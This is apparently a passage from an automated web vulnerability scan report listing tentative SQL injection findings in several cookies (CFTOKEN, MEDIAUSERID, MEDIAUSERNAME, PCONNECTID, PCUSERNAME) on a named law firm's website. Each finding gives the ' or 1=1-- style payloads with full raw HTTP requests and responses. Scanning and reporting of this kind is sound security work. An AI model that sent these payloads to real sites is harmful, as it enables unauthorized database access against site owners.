Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953722027432%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11820711;path=/
Set-Cookie: CFTOKEN=70141327;path=/
Date: Thu, 12 May 2011 16:45:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.61. http://www.pillsburylaw.com/index.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 10511659%20or%201%3d1--%20 and 10511659%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898810511659%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 16:46:07 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898810511659%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11820727;path=/
Set-Cookie: CFTOKEN=16431562;path=/
Date: Thu, 12 May 2011 16:46:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.62. http://www.pillsburylaw.com/index.cfm [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 99273307'%20or%201%3d1--%20 and 99273307'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=99273307'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 16:46:32 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=99273307'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.63. http://www.pillsburylaw.com/index.cfm [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 19279791'%20or%201%3d1--%20 and 19279791'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19279791'%20or%201%3d1--%20; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 16:46:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19279791'%20or%201%3d2--%20; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.64. http://www.pillsburylaw.com/index.cfm [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 56145523'%20or%201%3d1--%20 and 56145523'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=56145523'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 16:46:14 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=56145523'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 16:46:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</s
...[SNIP]...
1.65. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 11780295'%20or%201%3d1--%20 and 11780295'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=11780295'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
